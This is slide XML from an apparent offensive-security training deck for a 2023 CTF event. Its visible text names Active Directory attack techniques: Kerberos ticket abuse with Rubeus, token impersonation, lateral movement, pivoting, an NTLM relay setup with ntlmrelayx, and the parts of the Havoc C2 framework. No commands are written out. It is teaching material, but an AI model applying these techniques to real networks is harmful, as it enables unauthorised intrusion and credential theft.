            <a:ext cx="8518193" cy="55379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899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702BDA-5BF1-FFCC-5BE3-A27D72471B05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524953" y="-41293"/>
            <a:ext cx="914209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3. Kerberos Attack - Rubeus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FA5A0A-249A-EF2A-4DB4-FE3B910F1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037" y="1245405"/>
            <a:ext cx="8345925" cy="5224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84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702BDA-5BF1-FFCC-5BE3-A27D72471B05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830528" y="201290"/>
            <a:ext cx="10530939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3. KA - Dump ticket with LUID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6B760-D8D8-339B-0641-774C51508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182" y="1347282"/>
            <a:ext cx="9035633" cy="5020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046768-A210-EB22-2A01-A7F9F8D38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688" y="1800225"/>
            <a:ext cx="9058984" cy="45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702BDA-5BF1-FFCC-5BE3-A27D72471B05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1973583" y="-43931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3. KA - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" spc="250" err="1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CreateNetOnly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9911E-DAE9-2DD3-415C-C5C7BE2C8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0" y="1202116"/>
            <a:ext cx="12004757" cy="4376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568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702BDA-5BF1-FFCC-5BE3-A27D72471B05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="801468" y="-21915"/>
            <a:ext cx="10589058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3. KA – Token Impersonation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55F59-D82F-55F9-CCFE-5291144AE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101" y="1284193"/>
            <a:ext cx="8923793" cy="4740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444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E7A2251-6B05-3C32-8213-D5EC870B16BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1973584" y="-5866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4. Lateral Movement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8FCBD-2E75-BAE5-56DC-0FD519512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908" y="1106709"/>
            <a:ext cx="8980183" cy="5444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168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E96930E-2F5A-9B7B-E11D-B1FEB1151FFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1973584" y="31134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5. Pivoting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73ABF-3C51-5CD1-CBBF-B2C3531AC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569" y="1230472"/>
            <a:ext cx="9022862" cy="3635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9708A-E366-B9C3-09F5-722F2ABBB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569" y="3133073"/>
            <a:ext cx="9022862" cy="2568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4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9CBD4D1-7348-58B0-59B8-0F3FD421F75B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0F8E454-B00B-C468-1B29-985CF87FC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27" y="369424"/>
            <a:ext cx="7672080" cy="6247158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59DBAF40-A343-3302-7DDD-C0590F34F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999" y="45909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Cyber Kill Chain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5212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A6B405AD-DDAD-7FFC-88BB-A3D42BB49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072044"/>
            <a:ext cx="101519" cy="101519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A21B880-7A26-769A-A41B-5683D2F2C0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09" y="6367972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61D40348-7B83-AEE5-4B0D-4A59620411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609" y="6220008"/>
            <a:ext cx="101519" cy="10151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4E9C3C0-918A-0EC4-F992-9433463481CE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E96930E-2F5A-9B7B-E11D-B1FEB1151FFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1973584" y="31134"/>
            <a:ext cx="8244832" cy="944703"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="11260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 algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="887"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400" spc="25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5. NTLM Relay</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5400">
              <a:latin typeface="Tenorite" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Trebuchet M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023C6C1-75FF-99C7-5F8C-09A8C6BE8FED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1764429" y="4808768"/>
            <a:ext cx="8663141" cy="1732472"/>
            <a:chOff x="774266" y="2101568"/>
            <a:chExt cx="10706533" cy="22352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AF8527-B207-D15D-02FE-C79CBCB5E1A6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="774266" y="2101568"/>
              <a:ext cx="10706533" cy="22352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0FEF1AC-B82A-9708-7815-DBA538DA6FD6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="17" idx="1"/>
              <a:endCxn id="22" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="2870200" y="3219168"/>
              <a:ext cx="265430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C1BD7E0-D2D9-61F1-ABA7-87C32E06E7A8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>
              <a:off x="6667500" y="3219168"/>
              <a:ext cx="2654300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50A179C-6063-5937-021A-FD080D03D864}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4471534" y="2647668"/>
              <a:ext cx="3311997" cy="1602563"/>
              <a:chOff x="4471534" y="2647668"/>
              <a:chExt cx="3311997" cy="1602563"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="17" name="Picture 16" descr="Icon&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C623D61-37BE-ECA3-561C-10982F1B0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4500" y="2647668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B9D9AA-6BA4-981F-9698-3457B7F946F2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4471534" y="3667493"/>
                <a:ext cx="3311997" cy="58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err="1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151ac004</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="110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@ executable.exe\3604</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="110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[WORKSTATION-01\SYSTEM] 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2EA3A0E-58E8-94F8-F502-E83DCEE1DCDC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8325617" y="2647668"/>
              <a:ext cx="3135365" cy="1614516"/>
              <a:chOff x="8325617" y="2647668"/>
              <a:chExt cx="3135365" cy="1614516"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="20" name="Picture 19" descr="Icon&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C82CB33F-B905-4465-8413-1B7A72730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1800" y="2647668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5D1841-5C60-9BC5-8FC7-974420F6352D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8325617" y="3679446"/>
                <a:ext cx="3135365" cy="58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err="1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2bf230d6</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="110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@ rundll32.exe\4280</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="110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[DC01\administrator] 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02ACF6-84A5-28F6-72A5-88216C426B2D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="875763" y="2647668"/>
              <a:ext cx="2849033" cy="1311195"/>
              <a:chOff x="875763" y="2647668"/>
              <a:chExt cx="2849033" cy="1311195"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="22" name="Picture 21" descr="Icon&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{128F092F-ADEB-0B1E-7BA8-C6435FA8F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7200" y="2647668"/>
                <a:ext cx="1143000" cy="114300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6E09A3-E930-2EBB-9DBA-F47193753906}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="875763" y="3697253"/>
                <a:ext cx="28490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[TEAMSERVER] </a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grp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74958072-56E9-488A-1890-A43EF6655B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457" y="1140815"/>
            <a:ext cx="1061016" cy="1084009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152DB8EF-88AF-9ABB-86C8-305720BE8A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12" y="3263814"/>
            <a:ext cx="1061016" cy="1084009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F662C135-B925-49EB-BF39-84374FE89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02" y="1006971"/>
            <a:ext cx="1241452" cy="1268356"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="70" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F0BBE84-AA83-3A9F-BAB3-DD2295AF8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92" y="3376579"/>
            <a:ext cx="840270" cy="8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3965DFF-98C3-73E0-93C5-420A31769069}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6456503" y="1612648"/>
            <a:ext cx="886096" cy="47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BA52AA1-C340-AFD9-C8EA-3175333EBA7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6560045" y="2081757"/>
            <a:ext cx="3009838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relay victim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F01189-D0AB-C47E-3609-E16B3F84C2E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2575796" y="2057233"/>
            <a:ext cx="3009838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infected host (beacon)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B868B7-514E-9250-F7E8-8B9E14ED3B87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2613508" y="4215672"/>
            <a:ext cx="3009838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teamserver</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="110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2040B3-D1BE-8C9A-5132-5A3EABD0064F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6708131" y="4215672"/>
            <a:ext cx="3009838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target (e.g., DC01)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9DAF5B-B319-4D33-9BEC-0372090998AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4574267" y="1465725"/>
            <a:ext cx="699830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8445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7166F9-38DF-5473-412C-F8D84B66B5D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6008300" y="1465725"/>
            <a:ext cx="699830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445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C07306C-7DAA-404B-CB7F-256419BDD8C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5122314" y="1614817"/>
            <a:ext cx="886096" cy="47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28947A-8D10-7A40-865A-64ABD167EB0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3958171" y="2458591"/>
            <a:ext cx="0" cy="80522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73538FE-3397-ED26-8216-5A4655E3FFA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4332760" y="2711109"/>
            <a:ext cx="0" cy="52692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C308006-BF42-E686-52DE-1723E04CB5BB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5122314" y="2413869"/>
            <a:ext cx="2557198" cy="13919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6BB3A72-A6F1-3A54-7B92-10FAFDEF72B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2535491" y="2711109"/>
            <a:ext cx="1422680" cy="494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ntlmrelayx.py</a:t>
            </a:r>
          </a:p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(SMB server)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BCD5BB7-AE65-E338-022D-8F176D313EB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4039272" y="2404125"/>
            <a:ext cx="688266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9050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3CB6F9-EF34-15F2-7909-83580A3AFC80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5891679" y="2497688"/>
            <a:ext cx="1226437" cy="6423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1869961-953B-593D-2C8D-49806CEF95E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7190324" y="3183708"/>
            <a:ext cx="688266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8080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3CCCE2-3A5C-B7C5-608B-0A0D914652E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5430319" y="2229706"/>
            <a:ext cx="688266" cy="30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80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49465563-C3C4-E377-BF60-2284E1947216}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3571687" y="1494921"/>
            <a:ext cx="4411055" cy="2975920"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 3927496 w 3927496"/>
              <a:gd name="connsiteY0" fmla="*/ 406598 h 2901040"/>
              <a:gd name="connsiteX1" fmla="*/ 313857 w 3927496"/>
              <a:gd name="connsiteY1" fmla="*/ 169206 h 2901040"/>
              <a:gd name="connsiteX2" fmla="*/ 234726 w 3927496"/>
              <a:gd name="connsiteY2" fmla="*/ 2613468 h 2901040"/>
              <a:gd name="connsiteX3" fmla="*/ 727096 w 3927496"/>
              <a:gd name="connsiteY3" fmla="*/ 2648637 h 2901040"/>
              <a:gd name="connsiteX4" fmla="*/ 832603 w 3927496"/>
              <a:gd name="connsiteY4" fmla="*/ 775875 h 2901040"/>
              <a:gd name="connsiteX5" fmla="*/ 3461503 w 3927496"/>
              <a:gd name="connsiteY5" fmla="*/ 2402452 h 2901040"/>
              <a:gd name="connsiteX6" fmla="*/ 3461503 w 3927496"/>
              <a:gd name="connsiteY6" fmla="*/ 2402452 h 29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7496" h="2901040">
                <a:moveTo>
                  <a:pt x="3927496" y="406598"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2428407" y="103996"/>
                  <a:pt x="929319" y="-198606"/>
                  <a:pt x="313857" y="169206"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-301605" y="537018"/>
                  <a:pt x="165853" y="2200229"/>
                  <a:pt x="234726" y="2613468"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="303599" y="3026707"/>
                  <a:pt x="627450" y="2954902"/>
                  <a:pt x="727096" y="2648637"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="826742" y="2342372"/>
                  <a:pt x="376869" y="816906"/>
                  <a:pt x="832603" y="775875"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1288337" y="734844"/>
                  <a:pt x="3461503" y="2402452"/>
                  <a:pt x="3461503" y="2402452"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3461503" y="2402452"/>
                </a:ln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9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2F79342-7A01-19C4-FEF6-2327DA6EED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8519" y="115816"/>
            <a:ext cx="9660290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467" marR="3387" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="970"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="36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❕</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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 ASEAN Battle of Hackers 2023 </a:t>
            </a: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❕</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="7200">
              <a:latin typeface="Tenorite" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Trebuchet MS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9507D07-B8F4-B87A-6D79-350C6E713B0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3945558" y="2361485"/>
            <a:ext cx="7918598" cy="3226781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8AB4F8"/>
                </a:solidFill>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>📅 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tenorite" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>25th November 2023</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" spc="10" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Tenorite" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tenorite" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>📍   Hybrid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" spc="10" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Tenorite" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tenorite" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>🚩 Jeopardy CTF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" spc="10" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Tenorite" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tenorite" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>      @apu_fsec.ss</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2052" name="Picture 4" descr="Instagram Logo transparent PNG - StickPNG">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C8EC014-4D45-4696-1C1A-CE3288D90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558" y="5096854"/>
            <a:ext cx="491412" cy="49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6205C40-D234-8B59-23B3-D9F0D3EB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59" y="1269734"/>
            <a:ext cx="2987643" cy="748841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5F23880-3E12-E557-7616-DA36418D3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22" y="1094689"/>
            <a:ext cx="923886" cy="92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8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9CBD4D1-7348-58B0-59B8-0F3FD421F75B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59DBAF40-A343-3302-7DDD-C0590F34F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999" y="45909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Payload Out-of-the-Box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2050" name="Picture 2" descr="How the SmartScreen Filter Works in Windows 8 and 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8890EB59-E5E5-C11F-258C-687EAF49A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30" y="1071989"/>
            <a:ext cx="7848539" cy="54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71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29CBD4D1-7348-58B0-59B8-0F3FD421F75B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59DBAF40-A343-3302-7DDD-C0590F34F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700" y="40807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Important Components</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800">
              <a:latin typeface="Tenorite"/>
              <a:cs typeface="Trebuchet MS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4D4714C-4BB1-940C-F1EB-12F3A6F932C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1186159" y="1079091"/>
            <a:ext cx="7918598" cy="4843634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970"/>
              </a:spcBef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Havoc – developed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1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C5pider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Team Server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Accept client connections &amp; callbacks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Client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Graphical User Interface (GUI) for operators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</a:rPr>
              <a:t>Agent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Also called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" u="sng" spc="10">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tenorite" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Demon</a:t>
            </a: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 or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" u="sng" spc="10">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tenorite" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Beacon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="465667" marR="3387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800" spc="10">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tenorite" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="922867" marR="3387" lvl="1" indent="-4572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HTTP, HTTPS, SMB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3076" name="Picture 4" descr="spider-man clipart spider hanging - spider man black suit PNG image with transparent  background | TOPpng">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3E06D1E-01CF-6093-D099-CDE3F7F39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9" b="90570" l="1905" r="98810">
                        <a14:foregroundMark x1="9524" y1="23283" x2="7262" y2="28172"/>
                        <a14:foregroundMark x1="3214" y1="21304" x2="3810" y2="23632"/>
                        <a14:foregroundMark x1="1905" y1="25728" x2="2500" y2="27125"/>
                        <a14:foregroundMark x1="34762" y1="38068" x2="42143" y2="45634"/>
                        <a14:foregroundMark x1="44405" y1="22235" x2="46429" y2="30501"/>
                        <a14:foregroundMark x1="64524" y1="38650" x2="60595" y2="46333"/>
                        <a14:foregroundMark x1="33810" y1="40047" x2="37500" y2="44587"/>
                        <a14:foregroundMark x1="90952" y1="20489" x2="94762" y2="24680"/>
                        <a14:foregroundMark x1="98214" y1="22119" x2="98214" y2="22119"/>
                        <a14:foregroundMark x1="98810" y1="29802" x2="98810" y2="29802"/>
                        <a14:foregroundMark x1="49048" y1="90454" x2="49048" y2="90454"/>
                        <a14:foregroundMark x1="53571" y1="90570" x2="53571" y2="90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827857"/>
            <a:ext cx="2762017" cy="282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9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51FA441-97E6-61EE-1F45-4E9FD9CE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7" y="2102295"/>
            <a:ext cx="10827805" cy="24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1DFA02E3-FDCE-031C-19CB-B45C7C86BF49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E16A984-4B49-3DBA-08C4-D15C1D421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9209" y="48830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HTTP vs SMB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800">
              <a:latin typeface="Tenorite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6741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60C19"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill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916ADD2-9E2B-7513-B15B-7572B04C8A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227525"/>
            <a:ext cx="101519" cy="10151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3C7E5862-82AD-4E33-A05C-6C2BB6C5B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1" y="6379925"/>
            <a:ext cx="101519" cy="1015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900B2B-D54A-50B2-8FD2-499347FE6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76" y="5812048"/>
            <a:ext cx="729192" cy="729192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9D98F6B0-E757-2F77-EC4A-AB27E18EE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610" y="6075085"/>
            <a:ext cx="101599" cy="101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2AB2C9FB-53F1-6D24-6621-0A99355E63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610" y="5922725"/>
            <a:ext cx="101519" cy="101519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1DFA02E3-FDCE-031C-19CB-B45C7C86BF49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="281507" y="258729"/>
            <a:ext cx="492760" cy="492760"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="739140" h="739140">
                <a:moveTo>
                  <a:pt x="589432" y="364909"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="587057" y="360629"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="582777" y="357771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="484835" y="291617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="478180" y="287324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="469620" y="288759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="464870" y="295414"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="460590" y="302082"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="462013" y="310654"/>
                </a:lnTo>
                <a:lnTo>
